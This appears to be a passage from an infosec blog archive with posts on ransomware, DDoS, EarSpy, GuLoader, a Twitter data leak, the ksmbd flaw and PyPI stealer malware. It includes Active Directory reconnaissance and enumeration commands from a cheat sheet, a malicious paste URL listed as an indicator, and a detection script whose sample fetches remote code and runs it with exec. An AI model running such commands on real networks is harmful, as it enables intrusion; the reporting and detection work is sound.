Double extortion ransomware uses the same methods to access your network as traditional ransomware. To prevent initial access to a network, train employees on security awareness, establish password policies and implement multi-factor authentication. 

Run vulnerability assessments and patch known vulnerabilities regularly to avoid compromise. 

Back up Data

If an attacker infiltrates your network, an offline backup protects you against the first layer of a ransomware attack, the encryption, by making data recovery possible without paying.

Furthermore, encrypt your data at rest to blunt the second layer, double extortion: if the data is stolen, the ransomware group cannot read it and has nothing to leak.

Cyber Threat Intelligence

Threat Intelligence is a key pillar in the cyber security stack. Gathering information related to cyber threats provides insights into threat actors and methodologies that could impact your business. 

Stay ahead of the latest threat intelligence to detect and analyze threats. Hunt for signs of compromise that lead to a ransomware attack. 

Proper DDoS Protection

DDoS is now among the services that RaaS operators offer. You should protect your company’s network and servers with a DDoS security solution that tracks incoming traffic, identifies malicious requests, and diverts them away from your network and servers.

With sophisticated techniques, attackers are dispersing their DDoS attacks. Indusface offers DDoS protection solutions, enabling you to customize mitigation thresholds to isolate and block attacks. 

Conclusion

Cybercriminals continue to evolve their attack techniques; you can’t fall behind and expose your assets. 

If you are at risk of a triple extortion attack, paying the ransom is not the way out. Focus on preventing and mitigating attacks as they happen. 

The best solution would be to prevent the attack from happening in the first place. A comprehensive ransomware resilience plan is essential for preparation, prevention, and response.

Tags: Ransomware Protection Playbook


Dec 30 2022

Cybercriminals create new methods to evade legacy DDoS defenses

Category: Cybercrime, DDoS | DISC @ 10:40 am

The number of DDoS attacks we see around the globe is on the rise, and that trend is likely to continue throughout 2023, according to Corero. We expect to see attackers deploy ever higher rate request-based or packets-per-second attacks.

“DDoS attacks have historically focused around sending packets of large sizes with the aim to paralyze and disrupt the internet pipeline by exceeding the available bandwidth. Recent request-based attacks, however, are sending smaller size packets, to target higher transaction processing to overwhelm a target. Those with responsibility for network health and internet service uptime should be taking note of this trend,” explained Corero CTO, Ashley Stephenson.

Legal responsibility

Corero also predicts that 2023 will see more breaches being reported, because of the increasing trend for transparency in data protection regulations. Regulations such as the UK Government’s Telecoms Security Bill will compel organizations to disclose more cyber-incidents publicly.

We are also likely to see the legal responsibility for bad corporate behaviour when dealing with breaches being linked to individual executives. Examples such as Joe Sullivan, the former head of security at Uber, who was recently found guilty of hiding a 2016 breach, could set a precedent for linking data protection decisions to the personal legal accountability of senior executives.

Evading DDoS defenses

Attackers will continue to make their mark in 2023 by trying to develop new ways to evade legacy DDoS defenses. We saw Carpet Bomb attacks rearing their head in 2022 by leveraging the aggregate power of multiple small attacks, designed specifically to circumvent legacy detect-and-redirect DDoS protections or neutralize ‘black hole’ sacrifice-the-victim mitigation tactics. This kind of cunning will be on display as DDoS attackers look for new ways of wreaking havoc across the internet and attempt to outsmart existing thinking around DDoS protection.

In 2023, the cyberwarfare that we have witnessed with the conflict in Ukraine will undoubtedly continue. DDoS will continue to be a key weapon in the Ukrainian and other conflicts both to paralyse key services and to drive political propaganda objectives. DDoS attack numbers rose significantly after the Russian invasion in February and DDoS continues to be used as an asymmetric weapon in the ongoing struggle.

Earlier this year, in other incidents related to the conflict, DDoS attackers attempted to disrupt the Eurovision song contest in an attempt to frustrate the victory of the Ukrainian contestants. Similarly, when Elon Musk showed support for Ukraine by providing Starlink satellite broadband services, DDoS attackers tried to take the satellite systems offline and deny Ukraine much needed internet services.

“Throughout 2022 we observed DDoS attacks becoming increasingly sophisticated while at the same time the DDoS attack surface is expanding. With the number of recorded attacks on the rise and significant shifts in attackers’ motives and goals, 2023 will require organizations to ensure they have robust DDoS defense in place,” said Lionel Chmilewsky, CEO at Corero Network Security.

DDoS

AWS Best Practices for DDoS Resiliency

DDoS Defense Standard Requirements

Tags: ddos


Dec 30 2022

EarSpy – A New Attack on Android Devices Use Motion Sensors to Steal Sensitive Data

Category: Cyber Attack, Smart Phone | DISC @ 10:17 am

A team of security researchers has developed a new eavesdropping attack on Android devices, dubbed “EarSpy.” Using this attack, an attacker can infer the following:

  • Caller’s gender
  • Caller’s identity to various degrees
  • Speech content

EarSpy is an exploratory project that captures motion-sensor readings generated by the reverberations of a mobile device’s ear speaker, in order to develop new methods of eavesdropping.

Universities Involved in this Project

Cybersecurity researchers from five American universities have undertaken this academic project called EarSpy. These are all the names of the universities that are affiliated with this project:-

  • Texas A&M University 
  • New Jersey Institute of Technology
  • Temple University
  • University of Dayton
  • Rutgers University

Evolution of Smartphone Tech

Earlier research explored smartphone loudspeakers as the target for such attacks, because ear speakers were considered incapable of generating enough vibration for the side-channel attack to work.

The audio quality and vibration of modern smartphones, however, have improved greatly thanks to more powerful stereo speakers.

Even the tiniest resonance from a speaker can be measured by a modern device because it has more sensitive motion sensors and gyroscopes.

It is remarkable how little data the spectrogram records from the ear speaker of a 2016 OnePlus 3T, while the stereo ear speaker of a 2019 OnePlus 7T produces a significant amount of information.

In their experiments, the researchers used a OnePlus 7T and a OnePlus 9. On both devices they played a variety of pre-recorded audio sets through the ear speakers only.

Although the results of the tests varied according to the dataset and device, they indicated that eavesdropping via ear speakers can be accomplished successfully.

More on Detection Performance & Recommendations:

Using time- and frequency-domain features in the ML algorithm, the researchers tested detection performance on the OnePlus 7T device; the resulting output chart is reproduced below.

[Chart: EarSpy detection performance on the OnePlus 7T]


Tags: Android, Steal Sensitive Data


Dec 29 2022

Active Directory Exploitation Cheat Sheet

Category: Cheat Sheet, Windows Security | DISC @ 12:59 pm

https://ethicalhackersacademy.com/blogs/ethical-hackers-academy/active-directory

Active Directory is a Microsoft service that runs on Windows Server and is predominantly used to manage permissions and resources across the network; it also authenticates and authorizes all users and computers in a Windows domain network.

Recent cyber-attacks frequently target vulnerable Active Directory services in enterprise networks, where an organization manages thousands of computers from a single point of control, the domain controller, which is one of the main services targeted by APT groups.

Although exploiting Active Directory is a challenging task, this Active Directory Exploitation Cheat Sheet collects common enumeration and attack methods, organized into the following phases to keep it simple:

  • Recon
  • Domain Enum
  • Local Privilege Escalation
  • User Hunting
  • Domain Admin Privileges
  • Database Hunting
  • Data Exfiltration
  • Active Directory Exploitation Tools

Reconnaissance

The recon phase uses various modules, including a port scanner, which is invoked as follows.

PORT SCAN
Import-Module Invoke-Portscan.ps1
<#
Invoke-Portscan -Hosts "websrv.domain.local,wsus.domain.local,apps.domain.local" -TopPorts 50
echo websrv.domain.local | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"
Invoke-Portscan -Hosts 172.16.0.0/24 -T 4 -TopPorts 25 -oA localnet
#>

AD MODULE WITHOUT RSAT

The secret to running AD enumeration commands from the AD PowerShell module on a system without RSAT installed is the DLL located at C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management on a system that does have RSAT installed.

Set up your AD VM, install RSAT, extract the DLL and drop it on the system used to enumerate the Active Directory.

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Get-Command get-adcom*

Domain Enumeration

DOMAIN

  • Get current domain
      Get-NetDomain (PowerView)
      Get-ADDomain (ActiveDirectory Module)
  • Get object of another domain
      Get-NetDomain -Domain domain.local
      Get-ADDomain -Identity domain.local
  • Get domain SID for the current domain
      Get-DomainSID
      (Get-ADDomain).DomainSID
  • Get domain policy for the current domain
      Get-DomainPolicy
      (Get-DomainPolicy)."system access"
  • Get domain policy for another domain
      (Get-DomainPolicy -domain domain.local)."system access"
  • Get domain controllers for the current domain
      Get-NetDomainController
      Get-ADDomainController
  • Get domain controllers for another domain
      Get-NetDomainController -Domain domain.local
      Get-ADDomainController -DomainName domain.local -Discover

NETUSER
More on: To get a list of users in the current domain

Tags: Active Directory Exploitation Cheat Sheet


Dec 29 2022

INDUSTRIAL CYBERSECURITY USB THREAT REPORT 2022

Category: OT/ICS | DISC @ 11:52 am

INDUSTRIAL CYBERSECURITY USB THREAT REPORT 2022 – by Honeywell Forge

OT, ICS & SCADA Security

Tags: Industrial Cybersecurity, Threat Report


Dec 29 2022

GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection

Category: Antivirus, Malware, Threat detection | DISC @ 11:30 am

An advanced malware downloader named GuLoader has recently been exposed by cybersecurity researchers at CrowdStrike. This downloader is able to evade detection by security software using a variety of techniques.

While analyzing GuLoader’s shellcode, CrowdStrike discovered a brand-new anti-analysis technique by which the malware can determine whether it is running in an adversarial (analysis) environment: it examines the whole process memory for any VM-related strings.

Evolution of GuLoader Malware

On infected machines, GuLoader (aka CloudEyE) distributes remote access trojans such as AgentTesla, FormBook, Nanocore, NETWIRE, Remcos, and the Parallax RAT, using a VBS downloader.

GuLoader has been active since at least 2019 and has undergone several changes in its functionality and delivery methods. Over time, the malware has become more sophisticated, using various methods to evade detection and avoid being removed from infected systems.

It has also been distributed through other channels, such as exploit kits and hacked websites, and has been used in various campaigns to deliver a range of malware, including ransomware, banking Trojans, and other types of malware.

GuLoader also deploys strong anti-analysis techniques in order to remain undetected.

GuLoader follows a three-stage process: the VBScript first injects the shellcode embedded within it into memory, and the next stage then executes anti-analysis checks that protect the code from being analyzed.

The shellcode itself incorporates the same anti-analysis methods. Through this shellcode the attacker downloads a final payload of their choice and executes it on the compromised host, protected by the same anti-analysis methods as the original shellcode.

Detecting breakpoints used for code analysis is done with anti-debugging and anti-disassembling checks in the malware.

There is also a redundant code injection mechanism that avoids the NTDLL.dll hooks commonly used by antivirus programs and EDRs.

In order to detect and flag processes on Windows that may be suspicious, anti-malware engines use NTDLL.dll API hooking. 

Anti-Analysis Techniques

Here below we have mentioned the anti-analysis techniques used:-

  • Anti-Debugging
  • Anti-Virtual Machine
  • Process Hollowing

It was pointed out by experts that GuLoader remains a treacherous threat that is constantly evolving as it continues to develop. Furthermore, experts also provided indicators of compromise for the latest version of the downloader, as well as other key information.

GuLoader Malware Advanced Anti-Analysis

Antivirus Bypass Techniques: Learn practical techniques and tactics to combat, bypass, and evade antivirus software

Malware Analysis

Tags: Antivirus Bypass Techniques, Evade Detection, Malware


Dec 28 2022

CISO roles continue to expand beyond technical expertise

Category: CISO, vCISO | DISC @ 12:20 pm

CISO roles

The research shows the CISO seat to be relatively industry-agnostic—with 84% of CISOs having a career history of working across multiple sectors—with today’s CISOs expected to bring more breadth of leadership to their role as they move away from being technical experts.

“Today’s CISOs are taking up the mantle of responsibilities that have traditionally fallen solely to the CIO, which is to act as the primary gateway from the tech department into the wider business and the outside marketplace,” said James Larkin, Managing Partner at Marlin Hawk.

“This widening scope requires CISOs to be adept communicators to the board, the broader business, and the marketplace of shareholders and customers. By thriving in the ‘softer’ skill sets of communication, leadership, and strategy, CISOs are now setting the new industry standards of today and, I predict, will be progressing into the board directors of tomorrow.”

Key findings from the report include:

  • CISO profiles have changed dramatically—36% of CISOs analyzed with a graduate degree received a higher degree in business administration or management. This is down 10% from last year (46% in 2021). Conversely, there has been an increase to 61% of CISOs receiving a higher degree in STEM subjects (up from 46% in 2021).
  • More CISOs are being hired internally—Approximately 62% of global CISOs were hired from another company, indicating a slight increase in the number of CISOs hired internally (38% hired internally compared to 36% in 2021), but a large gap remains in appropriate successors.
  • CISO turnover rates have declined—but still remain high with 45% of global CISOs having been in their current role for two years or less, down from 53% in 2021, with 18% turnover year-over-year.

CISO roles continue to become more complex

“I would say that you shouldn’t have the CISO title if you’re not actively defending your organization; you have to be in the trenches,” said Yonesy Núñez, CISO, Jack Henry Associates. “I also feel that over the last eight to 10 years, the CISO role has become a CISO plus role: CISO plus engineering, CISO plus physical security, CISO plus operational resiliency, or CISO plus product security. As a result, we’ve seen multiple CISOs that have done a great job with cybersecurity, fusion centers, SOC, and leadership. This has paved the way for the CISO office to become a business enabler and also a transformational technology function.”

Kevin Brown, a seasoned cybersecurity executive, added, “We have over 100 countries at this point with their own data privacy legislation that makes doing global business in a compliant manner trickier than it used to be. As a result, in most organizations we’re seeing a tighter connection and collaborative spirit between data officers, CISOs, legal teams and marketing. CISOs have to be in the know on all priorities for these different sectors of the business so they can take them into account when writing policies—it’s a more complex job than it ever used to be.”

More organizations are appointing CISOs from within

The research shows a decrease in the percentage of CISOs hired externally (62%) in the last year, compared to 2021 (64%), indicating a potential shift towards an organization’s next CISO already operating inside the business.

Larkin went on to say, “As the importance of information security has grown, boards of directors, regulators, and shareholders have demanded greater controls, better risk management as well as more people and departments focusing on defending a company and its assets. Fortunately, this has had the positive side effect of creating more internal succession for the CISO position—organizations can look for risk and control focused talent in more places than just the office of the CISO.”

“Now candidates are being internally promoted to the role of CISO from IT Risk, Operational Risk Management, IT Audit, Technology Risk & Controls, among others,” Larkin added. “Not only does this give regulators more comfort that there are multiple sets of eyes on this at the leadership level, but it has also vastly increased the size of the succession talent pool and is helping to future-proof the information security industry as a whole.”

CISO turnover rates are still high for several reasons

“The not-so-secret secret is that no CISO can accomplish much in one or two years. Most CISOs change roles because of one of three reasons,” shares Shamoun Siddiqui, CISO at Neiman Marcus Group.

“First, their skillset is not up to par, and they get quietly pushed out by the company. Due to the extremely high demand for security leaders, often individual contributors get elevated to the role of CISO, and they get overwhelmed within months. Second, they have an insurmountable task with unrealistic expectations, and there is a lack of support from their peers and from the leadership of the company. The company may be paying lip service to cybersecurity but may not be forward-thinking enough to make it a priority. Third, they just get enticed by a better offer from somewhere else. There is such a shortage of security professionals and security leaders that companies keep offering increasingly high salaries and benefits to CISOs.”

Another factor leading to high turnover is poor hiring decisions that are a result of a lack of scrutiny and due diligence in the recruiting process. While the immediate need may outweigh a more thorough vetting, fast tracking a CISO hire can have adverse effects if there are other, more suitable candidates out there.

Tags: CISO


Dec 28 2022

400 Million Twitter Users’ Scraped Info Goes on Sale!

Category: Social network | DISC @ 10:51 am

The sample data seen by Hackread.com shows that the sold information also includes records on top celebrities and political figures, such as Democratic Rep. Alexandria Ocasio-Cortez and Bollywood’s Salman Khan.

On December 23, 2022, a threat actor going by the handle “Ryushi” claimed to sell more than 400 million Twitter users’ personal details on BreachedForums, a cybercrime and hacking forum that surfaced as an alternative to the now-seized Raidforums.

As seen by Hackread.com, the sample data attached to the post contains private email addresses, usernames, follower counts, creation dates, and, in certain cases, the user’s phone numbers.

400 Million Twitter Users' Scraped Info Goes on Sale!
Post from the threat actor (Image credit: Waqas – Hackread.com)

The sample data also contains a variety of well-known user accounts including New York Democratic Rep. Alexandria Ocasio Cortez, Ethereum cryptocurrency founder Buterin, Indian actor Salman Khan and cybersecurity reporter Brian Krebs. 

It is worth mentioning that the latest data leak came just one month after a hacker leaked the contact and personal details of over 5.3 million Twitter users online. Both the earlier and latest incidents are now being investigated by Irish authorities.

The threat actor stated in the post that the data had been “scraped via a vulnerability” but did not specify any further details.

Further, they openly advised the CEO of the social media giant, Elon Musk, that he should buy this data directly from the hacker instead of “paying $276 million USD in GDPR breach fines like Facebook did” but does not specify a price at which the data is being sold.

Offering to conduct the “deal” through a middleman, the threat actor states, “After that, I will remove this thread and will not sell this info again. And data won’t be sold to anyone else, which will stop a lot of celebrities and politicians from Phishing, Crypto scams, Sim swapping, Doxxing, and other things that will make your users lose trust in you as a company and thus stunt the current growth and hype.”

Researchers who have seen the sample data believe that this alleged data leak is the result of an API flaw which allowed the threat actor to search any email addresses or phone numbers and return a Twitter profile.

This attack followed only months after Twitter entered into a consent order with the US Federal Trade Commission binding it to maintain a privacy and information security program for the next two decades.

The agreement ended a federal investigation into Twitter’s use of phone numbers and email addresses for advertising purposes when they were collected to be used for multi-factor authentication. Twitter also paid a $150 million civil penalty.

Therefore, if this data breach is verified, the impact on Twitter would be drastic both financially and socially. At the time of writing, the data was still up for grabs.

Tags: Twitter, Twitter CISO, Twitter Hack


Dec 27 2022

Critical “10-out-of-10” Linux kernel SMB hole – should you worry?

Category: Linux Security | DISC @ 11:17 am

Just before the Christmas weekend – in fact, at about the same time that beleaguered password management service LastPass was admitting that, yes, your password vaults were stolen by criminals after all – we noticed a serious-sounding Linux kernel vulnerability that hit the news.

The alerts came from Trend Micro’s Zero Day Initiative (ZDI), probably best known for buying up zero-day security bugs via the popular Pwn2Own competitions, where bug-bounty hunting teams compete live on stage for potentially large cash prizes.

In return for sponsoring the prize money, the vendors of products ranging from operating systems and browsers to networked printers and internet routers hope to buy up brand new security flaws, so they can fix the holes responsibly. (To collect their prizes, participants have to provide a proper write-up, and agree not to share any information about the flaw until the vendor has had a fair chance to fix it.)

But ZDI doesn’t just deal in competitive bug hunting in its twice-a-year contests, so it also regularly puts out vulnerability notices for zero-days that were disclosed in more conventional ways, like this one, entitled Linux Kernel ksmbd Use-After-Free Remote Code Execution Vulnerability.

Serving Windows computers via Linux

SMB is short for server message block, and it’s the protocol that underpins Windows networking, so almost any Linux server that provides network services to Windows computers will be running software to support SMB.

As you can therefore imagine, SMB-related security bugs, especially ones that can be exploited over the network without the attacker needing to logon first, as is the case here, are potentially serious issues for most large corporate networks.

SMB support is also generally needed in home and small-business NAS (network attached storage) devices, which generally run Linux internally, and provide easy-to-use, plug-it-in-and-go file server features for small networks.

No need to learn Linux yourself, or to set up a full-blown server, or to learn how to configure Linux networking – just plug-and-play with the NAS device, which has SMB support built-in and ready to go for you.

Why the holiday timing?

In this case, the bug wasn’t deliberately disclosed on the night before the night before the night before Christmas in a not-so-ho-ho-ho bid to spoil your festive season by freaking you out.

And it wasn’t reported just before the weekend in a bid to bury bad PR by hoping you’d be vacation-minded enough either to miss the story completely or to shrug it off until the New Year.

The good news is that, as usually happens under the umbrella of responsible disclosure, the date for ZDI’s report was agreed in advance, presumably when the flaw was disclosed, thus giving the Linux kernel team sufficient time to fix the problem properly, while nevertheless not allowing them to put the issue off indefinitely.

In this case, the bug report is listed as having happened on 2022-07-26, and what ZDI refers to as the “co-ordinated public release of [the] advisory” was set for 2022-12-22, which turns out to be exactly 150 days, if you count old-school style and include the full day at each end.

So, even though this bug has had some dramatic coverage over the holiday weekend, given that it was a remote code execution (RCE) hole in the Linux kernel itself, and came with a so-called CVSS score of 10/10, considered Critical

…it was patched in the Linux source code within just two days of disclosure, and the fix was accepted and packaged into the official Linux kernel source code in time for the release of Linux 5.15.61, back on 2022-08-17, just 23 days after the report first came in.

In other words, if you’ve updated your Linux kernel any time since then, you’re already safe, no matter what kernel compilation settings you or your distro used. (This includes 24 subsequent updates to the kernel 5.15 series, now at 5.15.85, along with any versions of kernel 6.0, kernel 6.1 and the still-in-candidate-stage kernel 6.2, all of which had their first releases after August 2022.)

Probably not the SMB software you suspect

Also, although it sounds at first glance as though this bug will inevitably affect any Linux server or device supporting Windows networking, that’s not true either.

Most sysadmins, and in our experience most NAS programmers, provide Windows SMB support via a long-running and well-respected open source toolkit called Samba, where the name Samba is simply the closest pronounceable word that the original developer, open-source luminary Andrew “Tridge” Tridgell OAM, could find to represent the abbreviation SMB.

Anyone who has used Samba will know that the software runs as a regular application, in what’s known as user space, in other words, without needing its own code running inside the kernel, where even modest bugs could have dangerous repercussions.

Indeed, the main Samba program file is called smbd, where the trailing -D is a typical Unixism standing for daemon, or background process – what Windows admins would call a service.

This bug, as you can see from the ZDI report, is in a kernel module called ksmbd, where the -D denotes a background service, the -SMB- denotes Windows networking support, and the K- means runs in kernel space, i.e. right inside the kernel itself.

At this point, you’re probably asking yourself, “Why bury the complexity of supporting SMB right into the kernel, given that we’ve already got a reliable and well-respected user-space product in the form of Samba, and given that the risks are much greater?”

Why, indeed?

As so often, there seem to be two main reasons: [A] because we can! and [B] because performance.

By pushing what are typically high-level software features down into the kernel, you can often improve performance, though you almost always pay the price of a corresponding, and possibly considerable, decrease in safety and security.

What to do?

  • Check if you have a Linux kernel based on any release on or after 5.15.61 (dated 2022-08-17). If so, this bug is fixed in the source code. No matter what kernel compilation options you (or your distro maker) choose, the bug can’t and won’t exist on your system.
  • Check if your Linux kernel build even includes ksmbd. Most popular distros neither compile it in, nor build it as a module, so you can’t load it or activate it, even by mistake.
  • Check with your vendor if you are using an appliance such as a NAS box or other device that supports connections from Windows computers. Chances are that your NAS device won’t be using ksmbd, even if it still has a kernel version that is vulnerable in theory.
  • If you’re using ksmbd out of choice, consider re-evaluating your risk. Make sure you measure the true increase in performance you’ve achieved, and decide whether the payoff is really worth it.

COMMANDS YOU CAN USE TO CHECK YOUR EXPOSURE

Any Linux from 5.15.61 on, or any 6.x, is already patched.
To check your Linux version:

  $ uname -o -r
  6.1.1 GNU/Linux

To see if this kernel feature is compiled in, you can dump the compile-time configuration of the running kernel:

  $ zcat /proc/config.gz | grep SMB_SERVER
  # CONFIG_SMB_SERVER is not set

(/proc/config.gz only exists if the kernel was built with CONFIG_IKCONFIG_PROC; if it is missing, most distros ship the same information as /boot/config-$(uname -r), which you can grep directly.)

If this compile-time configuration setting is unset, or set to "n" for no, the feature wasn't built at all.

If it says "y" for yes, then the kernel SMB server is compiled right into your kernel, so ensure you have a patched version.

If it says "m" for module, then the kernel build probably includes a run-time module that can be loaded on demand. To see if your kernel has a loadable module available:

  $ /sbin/modprobe --show ksmbd
  modprobe: FATAL: Module ksmbd not found in directory /lib/modules/6.1.1

Note that "--show" means "do not actually do it, just show whether loading it would work or not".
To see if your system has the ksmbd module already active:

  $ lsmod | grep ksmbd

If you see no output, the module wasn’t matched in the list, i.e. it isn't currently loaded.

To stop the module loading in case it ever shows up, add a file with a name such as ksmbd.conf to the directory /etc/modprobe.d (the directory modprobe actually reads; /lib/modprobe.d is the distro-owned equivalent) with this line in it:

  blacklist ksmbd

Note that "blacklist" only stops the module being pulled in automatically through its aliases; an explicit "modprobe ksmbd" would still succeed. To refuse even explicit loads, use this line instead:

  install ksmbd /bin/false
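The checks above wrapped into one script, as an added example that is not part of the article: it takes the kernel release, the config dump and the loaded-module list, applies the article's rule (the 5.15 series from 5.15.61, or any 6.x, counts as fixed) and deliberately reports any other 5.x series as unfixed so that you go and check your distro's changelog; live_report() reads /proc/config.gz and /proc/modules on a Linux host.

```python
# Added example (not from the article): automate the ksmbd exposure checks above.
# Rule assumed from the article: 5.15.61+ (5.15 series) or any 6.x has the fix.
import gzip, os, re

def parse_release(release):
    """'5.15.85-generic' -> (5, 15, 85); a missing patch level counts as 0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)

def kernel_has_fix(release):
    """Other 5.x stable series (5.18.y, 5.19.y, ...) come back False on purpose:
    check your distro's changelog for the backport instead of trusting this."""
    major, minor, patch = parse_release(release)
    return major >= 6 or ((major, minor) == (5, 15) and patch >= 61)

def smb_server_status(config_text):
    """'builtin' (=y), 'module' (=m), 'unset' (not set) or 'absent' (no option)."""
    wanted = {"CONFIG_SMB_SERVER=y": "builtin", "CONFIG_SMB_SERVER=m": "module",
              "# CONFIG_SMB_SERVER is not set": "unset"}
    for line in config_text.splitlines():
        if line.strip() in wanted:
            return wanted[line.strip()]
    return "absent"

def assess(release, config_text, loaded_modules):
    """Combine kernel release, build config and lsmod-style data into a verdict."""
    if kernel_has_fix(release):
        return "patched: kernel %s carries the fix" % release
    status = smb_server_status(config_text)
    if status in ("unset", "absent"):
        return "unexposed: ksmbd was not built for this kernel"
    if status == "builtin":
        return "EXPOSED: ksmbd is built into an unpatched kernel"
    if "ksmbd" in loaded_modules:
        return "EXPOSED: ksmbd module is loaded on an unpatched kernel"
    return "at risk: ksmbd module available but not loaded; blacklist it"

def live_report():
    """Run the checks on this host; /proc/modules is what lsmod reads."""
    release = os.uname().release
    if not os.path.exists("/proc/config.gz"):  # needs CONFIG_IKCONFIG_PROC
        return "unknown: no /proc/config.gz; try /boot/config-%s" % release
    with gzip.open("/proc/config.gz", "rt") as fh:
        config_text = fh.read()
    with open("/proc/modules") as fh:
        loaded = {ln.split()[0] for ln in fh if ln.strip()}
    return assess(release, config_text, loaded)
```

Call live_report() on the host you want to check; the other functions take the captured command output so you can assess a fleet offline.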

Mastering Linux Security and Hardening: Protect your Linux systems from intruders, malware attacks, and other cyber threats

Infosec books | InfoSec tools | InfoSec services

Tags: Linux Security, Mastering Linux Security and Hardening


Dec 27 2022

Hackers Deploy New Information Stealer Malware onto Python Developers’ Machines

Category: Malware,PythonDISC @ 10:48 am

Researchers at Phylum recently discovered that hackers had been injecting information stealer malware into Python developers’ machines in order to steal their information.

As they dug deeper, they discovered a new stealer variant circulating under many different names. Apart from the naming, the program’s source code reveals that it is a straightforward copy of the older stealer, W4SP.

Attack Chain to Deploy Malware

In this case the stealer was dropped directly into the package’s main.py file, without obfuscating the code or making any other obvious attempt to escape detection.

Only one instance has been found in which multiple stages were used to obfuscate and obscure the attacker’s intentions. In that case, the attacker used a package called chazz with a simple first stage that pulled obfuscated code from the klgrth.io website.

There is a great deal of similarity between the first stage of the stealer code and the injector code. The code has been obfuscated with BlankOBF, an obfuscation program; as soon as it is de-obfuscated, it reveals the Leaf $tealer.
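One way to triage a package for the chazz-style first stage described above (fetch code from a paste site, then run it with exec), as an added example that is not Phylum’s tooling: it walks the package source with Python’s ast module and flags exec/eval/compile calls whose input comes from a network fetch, plus string literals naming a suspect host. The klgrth.io host is the one named in the post; the fetcher names and the sample package source are constructed assumptions.

```python
# Added example (not Phylum's code): static triage for the first-stage pattern described
# above, where a tiny package fetches remote code and runs it with exec(). The sample
# package source is constructed; only the klgrth.io host comes from the post.
import ast

FETCHERS = {"urlopen", "urlretrieve", "get", "post"}  # urllib.request / requests calls
RUNNERS = {"exec", "eval", "compile"}
SUSPECT_HOSTS = ("klgrth.io",)  # paste host named in the post; extend with your own list

def _call_name(node):
    """'requests.get(...)' -> 'get', 'exec(...)' -> 'exec', anything else -> None."""
    if isinstance(node.func, ast.Attribute):
        return node.func.attr
    if isinstance(node.func, ast.Name):
        return node.func.id
    return None

def find_fetch_and_exec(source, filename="<package>"):
    """Return (lineno, message) findings: exec/eval/compile fed by a network fetch,
    directly or via a variable (flow-insensitive), plus literals naming a suspect host."""
    tree = ast.parse(source, filename)
    tainted, findings = set(), []
    for node in ast.walk(tree):  # pass 1: taint variables assigned from a fetch
        if isinstance(node, ast.Assign):
            calls = [n for n in ast.walk(node.value) if isinstance(n, ast.Call)]
            if any(_call_name(c) in FETCHERS for c in calls):
                tainted.update(t.id for t in node.targets if isinstance(t, ast.Name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(host in node.value for host in SUSPECT_HOSTS):
                findings.append((node.lineno, "suspect host in literal: " + node.value))
    for node in ast.walk(tree):  # pass 2: runners whose input traces back to a fetch
        if not (isinstance(node, ast.Call) and _call_name(node) in RUNNERS):
            continue
        inner = [n for n in ast.walk(node) if isinstance(n, ast.Call) and n is not node]
        direct = any(_call_name(c) in FETCHERS for c in inner)
        via_var = any(isinstance(n, ast.Name) and n.id in tainted for n in ast.walk(node))
        if direct or via_var:
            findings.append((node.lineno, "%s() fed by a network fetch" % _call_name(node)))
    return sorted(findings)

# Constructed sample mimicking a one-file first stage (the paste path is a placeholder).
SAMPLE = """import requests
from urllib.request import urlopen
url = "https://www.klgrth.io/paste/PLACEHOLDER/raw"
data = requests.get(url).text
exec(data)
exec(urlopen("https://example.invalid/stage2").read())
print(requests.get("https://example.invalid/version").text)  # fetch without exec
"""
```

Run find_fetch_and_exec() over setup.py and every module of a package before installing it; a hit is a reason to read the code, not a verdict by itself.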

Malicious Packages

Listed below are packages that share similar IOCs; this list can be expected to grow over the coming months and years:

  • modulesecurity – “Celestial Stealer”
  • informmodule – “Leaf $tealer”
  • chazz – first stage that pulls from https://www.klgrth.io/paste/j2yvv/raw, which contains the obfuscated code described above
  • randomtime – “ANGEL stealer”
  • proxygeneratorbil – “@skid STEALER”
  • easycordey – “@skid Stealer”
  • easycordeyy – “@skid Stealer”
  • tomproxies – “@skid STEALER”
  • sys-ej – “Hyperion Obfuscated code”
  • infosys – “@734 Stealer”
  • sysuptoer – “BulkFA Stealer”
  • nowsys – “ANGEL Stealer”
  • upamonkws – “PURE Stealer”
  • captchaboy – “@skid STEALER”
  • proxybooster – “Fade Stealer”

W4SP Copies

W4SP’s original publication in loTus’s repository has been disabled by GitHub staff for violating GitHub’s terms and conditions, and as a result it can no longer be found there.

It has been Phylum’s mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.

It was discovered that several copies of W4SP-Stealer started appearing under different names as soon as the repo for W4SP-Stealer was removed. This new stealer is already being distributed through PyPI by threat actors, which is a sign that it is becoming a real threat.

It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.

  • Satan Stealer
  • angel-stealer

There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop. 

W4SP Stealer will likely remain part of the scene for quite some time to come, as will its imitations and other variants.

There will be a constant increase in the number of their attempts, their persistence and their sophistication as time passes. Phylum, for its part, states that its platform is capable of mitigating and blocking supply chain attacks of this kind.

Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

Tags: Information Stealer Malware


Dec 26 2022

Cybersecurity in 2022: It’s Not Getting Easier

Category: Cyber careerDISC @ 3:07 pm

by Mike Rothman 

As we wrap up the year, it always makes sense to take a look back and see what worked and what didn’t; what we can do better and what we have to accept. When 2021 ended, it was pretty bad. We were still trying to navigate COVID-19 and plan for a return to in-person work. But the markets were decent, the investment dollars kept flowing and while effective cybersecurity was hard, there was some optimism that it would get better.

Well, it didn’t. In hindsight, it should have been obvious that a recession was coming. Companies of all shapes and sizes tightened their belts, expecting security to do more with less. Yeah, you’ve heard that story before. Of course, you probably couldn’t have projected Russia’s attack on Ukraine nor planned for the cybergyrations necessary to determine if you were within the blast radius of the attack(s).

Data and workloads continued to move to the cloud unabated, putting pressure on data governance policies and visibility efforts to track the data. Many organizations now expect to run their environments (both development and infrastructure) using CI/CD pipelines, and they haven’t been proactive in understanding how to protect them.

